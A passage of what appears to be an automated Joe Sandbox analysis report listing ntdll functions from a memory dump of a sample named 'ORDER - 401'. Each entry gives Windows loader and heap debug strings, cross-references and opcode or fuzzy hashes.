                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0104C6C3
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01088170
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01088181, 010881F5
                                                                                  • LdrpInitializeProcess, xrefs: 0104C6C4
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010881E5
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01088177, 010881EB
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
                                                                                  • Instruction ID: 4d2401aa768cac4732c85b210f54c7a8a6576f3395d8286dd58fdda1d5c0044f
                                                                                  • Opcode Fuzzy Hash: 7a9a7b622127485bff3b39f04be5990c961dfb5d26097b00d51abad21bc483bb
                                                                                  • Instruction Fuzzy Hash: 353135B17487069FD324EF28D985E6AB7D9EFD4B10F044568F9C1AB290E620EC04C7A2
                                                                                  APIs
                                                                                    • Part of subcall function 01052DF0: LdrInitializeThunk.NTDLL ref: 01052DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01050D74
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
                                                                                  • Instruction ID: af13ca2e73372197752cc46fb49785df36411add57602c6ae039bd90898bddfb
                                                                                  • Opcode Fuzzy Hash: c0e672b5bb815c73c9368ac0196c668ccf7acb1f2f2135a162802f3d9757bc91
                                                                                  • Instruction Fuzzy Hash: F6425B75900715DFDBA1DF28C880BAAB7F4BF44314F1485A9E9C9EB245E770AA84CF60
                                                                                  Strings
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
                                                                                  • Instruction ID: a0baacdf8f837fb9cb4c5dd3dd139919f50e9f2da5a77fab307b9e44d968a5a3
                                                                                  • Opcode Fuzzy Hash: c1dc5089b5375980c51080cd26135e5821a588c223b59154d92a98d0aa673cf5
                                                                                  • Instruction Fuzzy Hash: 61C1AD706093C6CFD711DF58C040BAAB7E4BF88704F04496AF9D58B259E738CA49CB56
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01048421
                                                                                  • @, xrefs: 01048591
                                                                                  • LdrpInitializeProcess, xrefs: 01048422
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0104855E
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
                                                                                  • Instruction ID: 511c4af37a9c9cbf2d386762e73570cb8a46a9b72e9a0972c62dd86fd5777734
                                                                                  • Opcode Fuzzy Hash: 83fa70ab3e42e7a1d08d9f9a3600e27f41090105269e78063d36c8a2ef814f85
                                                                                  • Instruction Fuzzy Hash: 00916EB1508345AFEB61EE65CC80EABBAE8BF84744F404D3EFAC496151E734D9448B62
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010822B6
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010821D9, 010822B1
                                                                                  • .Local, xrefs: 010428D8
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 010821DE
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
                                                                                  • Instruction ID: 323ee6f63798258620a0f6657026ccf8a1fc2bde2d07c78fec6001e7e4370699
                                                                                  • Opcode Fuzzy Hash: 2b3d121b21b8be6d20b5d78754f55935952cdac387be62218cfeed5f0ad0c4ad
                                                                                  • Instruction Fuzzy Hash: D3A1D175A0422ADBDB64DF58EC84BA9B7B0BF58314F1541F9E988AB251D7309E80CF90
                                                                                  Strings
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01083456
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01083437
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0108342A
                                                                                  • RtlDeactivateActivationContext, xrefs: 01083425, 01083432, 01083451
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  • Opcode ID: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
                                                                                  • Instruction ID: 5c102999bc9a9ac4b890564c2472b227493d90b300892cdd9a504ff818451338
                                                                                  • Opcode Fuzzy Hash: 7e0bfc4765e5d1fda9c278910fa080321fa589c310ab1a744bf1029676adbba5
                                                                                  • Instruction Fuzzy Hash: 47613572604B169BD762DF1CC881B2ABBE0BF80B10F1885A9E9D5DF251DB30E800CB95
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01070FE5
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010710AE
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0107106B
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01071028
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
                                                                                  • Instruction ID: d7e564fe4d609a5a29dd48f7eb9c6f8bbd888a2de74d347a7244dfaa8640d264
                                                                                  • Opcode Fuzzy Hash: ac97c3052e29f29633a27dcf5281714772a51aff80e5b4643c9e364c19e78184
                                                                                  • Instruction Fuzzy Hash: 8671DFB19043059FCB61DF14CC84B9B7FE8AF55764F0004A9F9898B18AD779D588CBD2
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01083640, 0108366C
                                                                                  • LdrpFindDllActivationContext, xrefs: 01083636, 01083662
                                                                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0108362F
                                                                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0108365C
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                  • API String ID: 0-3779518884
                                                                                  • Opcode ID: 8abc3e7eab862bb6664f67e5d04cfb0de28f5344a92562d3422fda391108f93f
                                                                                  • Instruction ID: 36127d20228421b2becb59de62b223075a2fcfccaa68bad222691be2931952cf
                                                                                  • Opcode Fuzzy Hash: 8abc3e7eab862bb6664f67e5d04cfb0de28f5344a92562d3422fda391108f93f
                                                                                  • Instruction Fuzzy Hash: E93129E2900611AFDF76BA0CCCC8B7976E4BB01B54F0641BAD6D4D7151D7B0DC808791
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0107A9A2
                                                                                  • LdrpDynamicShimModule, xrefs: 0107A998
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0107A992
                                                                                  • apphelp.dll, xrefs: 01032462
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
                                                                                  • Instruction ID: c5e1598189791b31e2148c9e7c79e6edc6f153eab5b0af7bba7a50963dcb0317
                                                                                  • Opcode Fuzzy Hash: d2512c5cc2549dbd43311f08445e2baf8b8408b31974c09021a63bc4424a29b9
                                                                                  • Instruction Fuzzy Hash: 38316A75F00201EBDB3A9F5CD880AAE77F4FB84710F19006AE9A067245CBF099D1C740
                                                                                  Strings
                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0102327D
                                                                                  • HEAP[%wZ]: , xrefs: 01023255
                                                                                  • HEAP: , xrefs: 01023264
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                  • API String ID: 0-617086771
                                                                                  • Opcode ID: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
                                                                                  • Instruction ID: 5ba3116403c43f1572d4ae2150e4f3b81331c92041ebc16be7e52824dfe13e34
                                                                                  • Opcode Fuzzy Hash: 17956fb4fba118d3f9fe487084ee7b4a5e93ff42e38ba746848fb67a437a793f
                                                                                  • Instruction Fuzzy Hash: 9B92DF70A04269DFDB65CFA8C444BAEBBF1FF48300F1480A9E999AB351D739A941CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-4253913091
                                                                                  • Opcode ID: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
                                                                                  • Instruction ID: 4864bc5d46b621048e469de66749eafb6c0a5f277576951059993203282bca7a
                                                                                  • Opcode Fuzzy Hash: c44fbe452cf9b86a92f889836e5aa95ce5d7980cd6984b3fbc1c021aaefd2120
                                                                                  • Instruction Fuzzy Hash: BFF19A70B00616DFEB26CF68C884BAAB7F5FF45304F1481A8E5969B395D734E981CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $@
                                                                                  • API String ID: 0-1077428164
                                                                                  • Opcode ID: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
                                                                                  • Instruction ID: 55846ee17ffa2715ced80e54982b56f3f6c4a52edad7215ba17fca56a80d9040
                                                                                  • Opcode Fuzzy Hash: fcb94c3ce3104de2931bfea124ad4b5c9b84698a97e6639621e1ebdc5e893c46
                                                                                  • Instruction Fuzzy Hash: BFC27DB1A083419FE765CF28C880BABBBE9AFC8714F04896DF9C987241D735D944CB52
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                  • API String ID: 0-2779062949
                                                                                  • Opcode ID: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
                                                                                  • Instruction ID: f9ccb971ca57f0927b7981f9de6eb8645034fde2f7d7b9a75d102d971fd10062
                                                                                  • Opcode Fuzzy Hash: b4cfa3a389c948a71442ac7111804643c319b367a59708b74459534c91fd355e
                                                                                  • Instruction Fuzzy Hash: FFA16D719012299BEB71DF68CD88BEEB7B8EF48710F1041E9E989A7250D7359E84CF50
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0107A121
                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0107A10F
                                                                                  • LdrpCheckModule, xrefs: 0107A117
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-161242083
                                                                                  • Opcode ID: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
                                                                                  • Instruction ID: e93891b20a2002b41546ffebf079d21a45a55ca14bcb75af67b52cf077c1e1fa
                                                                                  • Opcode Fuzzy Hash: 7e837ffc2d6a75bba93c7c754375d09bbe87359d40a9bc37b147cef4988ccce9
                                                                                  • Instruction Fuzzy Hash: AC71F170E00209DFDB2ADF68C880ABEB7F4FB84704F18446DE99697255E774AD81CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-1334570610
                                                                                  • Opcode ID: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
                                                                                  • Instruction ID: b98da8b52cae013446b65e9f2ca7e5d54f4c8bd9500045759ef6b8008c9151a7
                                                                                  • Opcode Fuzzy Hash: 7541bed8585447b6ef340f4d1396916a111bfd2c2ba4e3de994b75d8027659b9
                                                                                  • Instruction Fuzzy Hash: 1461C270600355DFDB6ACF28C880BAABBE1FF45704F148599E4D98F296D770E881CB95
                                                                                  Strings
                                                                                  • Failed to reallocate the system dirs string !, xrefs: 010882D7
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 010882E8
                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010882DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1783798831
                                                                                  • Opcode ID: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
                                                                                  • Instruction ID: fdd596af89e477120d8d04e1ef88dd180ecebb8b05bd43c665001982b1fdf6b3
                                                                                  • Opcode Fuzzy Hash: 0baac97f1b616b35e80fa050b7e74d0126c1ddcb69c6f32ba00f69b662741315
                                                                                  • Instruction Fuzzy Hash: 914125B1945315ABE726EB68DD80B9B77E8BF48750F00453AF9D8D3291E7B0D840CB91
                                                                                  Strings
                                                                                  • @, xrefs: 010CC1F1
                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010CC1C5
                                                                                  • PreferredUILanguages, xrefs: 010CC212
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                  • API String ID: 0-2968386058
                                                                                  • Opcode ID: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
                                                                                  • Instruction ID: 398e9f32534073c47e7657cda15a1a2e89c69de817fb4a541bd3cea884e90b54
                                                                                  • Opcode Fuzzy Hash: 8f1e2b76d980330cf1c831fd729956688b870f5fb49a8cde47ea9551ab7751c4
                                                                                  • Instruction Fuzzy Hash: A4416171E00219EBEF51DBD8C951BEEBBF9AB14B00F14406AEA49B7290D7749E44CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                  • API String ID: 0-1373925480
                                                                                  • Opcode ID: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
                                                                                  • Instruction ID: eafc0d39a20c03b6f4dbf1ba606b8d9527cd8596a651df1fa49bebd9c519a67f
                                                                                  • Opcode Fuzzy Hash: 95fa8bff434819559b838bdc9953e138036dda644062ff137db86740348ab7f7
                                                                                  • Instruction Fuzzy Hash: C641E335A042598BEB21DBE9C840BADBBF8FF55340F5804A9D981EF792D7B49901CB10
                                                                                  Strings
                                                                                  • LdrpCheckRedirection, xrefs: 0109488F
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01094899
                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01094888
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-3154609507
                                                                                  • Opcode ID: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
                                                                                  • Instruction ID: 8f15c7434d7027517979fe3ecfbde74a40106982a4f7cb4de015211c85cdf10a
                                                                                  • Opcode Fuzzy Hash: 61d89fbee4676aa349347a9bc495a186968b42cfc65145eb8c883c5dfa5346fa
                                                                                  • Instruction Fuzzy Hash: A841D332A146558FCF61CE59DA60A2FBBE4FF49A50F0505A9EDD8DB261D330D802EB81
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-2558761708
                                                                                  • Opcode ID: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
                                                                                  • Instruction ID: 965411afe837d07e17c5b2aa7d89630a98f5c9c2ce43cdd5c41c6b77fed8a998
                                                                                  • Opcode Fuzzy Hash: c4850323479405fc694f91fb90745562328483e56c8a1d56bcd06b104edb6df0
                                                                                  • Instruction Fuzzy Hash: BC1106317542529FEB6ACB18C844BFAB3A5EF40719F14816DF486CB295DF30D840C759
                                                                                  Strings
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01092104
                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 010920F3
                                                                                  • LdrpInitializationFailure, xrefs: 010920FA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2986994758
                                                                                  • Opcode ID: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
                                                                                  • Instruction ID: 3f575b25f353761ef2f8d7b047873a1b9420715f802817db04703543ff52556d
                                                                                  • Opcode Fuzzy Hash: 420c9b28597ccd47b5bdf994de11739ce6af0aaa00d9bfea443ff506513c46fd
                                                                                  • Instruction Fuzzy Hash: F7F0C875A5030CBFEB24E64CDC56FE937A8EB50B54F100069F79067286D2F0A990D691
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: #%u
                                                                                  • API String ID: 48624451-232158463
                                                                                  • Opcode ID: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
                                                                                  • Instruction ID: 25e5f0a1c11ae461e1ae90987d178925e899c8d3b24a9e5418be336da90a457a
                                                                                  • Opcode Fuzzy Hash: f3e810e623d3e9b38c98851d750e0713d7890b7ef1023454827e01acace110b4
                                                                                  • Instruction Fuzzy Hash: 8C714971A0025A9FDB05DFA8C994BEEB7F8BF08304F144065E985EB255EA34ED41CB64
                                                                                  Strings
                                                                                  • LdrResSearchResource Enter, xrefs: 0101AA13
                                                                                  • LdrResSearchResource Exit, xrefs: 0101AA25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                  • API String ID: 0-4066393604
                                                                                  • Opcode ID: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
                                                                                  • Instruction ID: a91336a41b885416d080c5cb7c6a1995ce5fcc912a3e0479814749392b58fcd6
                                                                                  • Opcode Fuzzy Hash: a0c12789788ff2632d5f4542edd06ecb2e639102deba460825552fd8a5c1c579
                                                                                  • Instruction Fuzzy Hash: CDE1A171F01299DFEF22CEA8C980BEEBBB9BF04310F144466E981EB245D7789940CB54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$`
                                                                                  • API String ID: 0-197956300
                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction ID: 3aa179abf87529710931dad2682d2c088b54d859222fbd84ad363321ab74f6f7
                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                  • Instruction Fuzzy Hash: 04C18D31304346DBEB25CE28C841B6BBBE5AFC8318F184A6DF6D68B290D775D505CB51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Legacy$UEFI
                                                                                  • API String ID: 2994545307-634100481
                                                                                  • Opcode ID: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
                                                                                  • Instruction ID: 79fefde8364c8c8d03f469e8a3da1d46a34a1cde605e2141510607a5824da5aa
                                                                                  • Opcode Fuzzy Hash: ea95de93d3cc43603280abb8f908b2c906aafaed627d1acab1851e382bd54de0
                                                                                  • Instruction Fuzzy Hash: 15614B71E14619DFDB14EFA9C940BAEBBF5FB48700F144069EA89EB291D731A940CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$MUI
                                                                                  • API String ID: 0-17815947
                                                                                  • Opcode ID: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
                                                                                  • Instruction ID: e3e4578ed356e490ad2d0ea0511b9262801119e58e8ba3da37790e06c01f93fa
                                                                                  • Opcode Fuzzy Hash: 7be96790e191cf7f30db15ad7f9afe9748a37a7d103524a8e616371579281e5e
                                                                                  • Instruction Fuzzy Hash: 11511871E0061DAEDB11DFA9CC80AEFBBB8AF48754F100529EA91E7291D7359A05CB60
                                                                                  Strings
                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0101063D
                                                                                  • kLsE, xrefs: 01010540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                  • API String ID: 0-2547482624
                                                                                  • Opcode ID: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
                                                                                  • Instruction ID: 30650d1413d0efc876a89b9dd32b748ae1c0c58075f9d78429aa48745431afcf
                                                                                  • Opcode Fuzzy Hash: 931262513d9bdc8152a72b575373188347718352e59bce7857de26d07974c766
                                                                                  • Instruction Fuzzy Hash: 4151C1715047428BD725EF68C5406A7BBE4AF88304F108C3EF6D987249E778D985CB92
                                                                                  Strings
                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0101A309
                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0101A2FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                  • API String ID: 0-2876891731
                                                                                  • Opcode ID: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
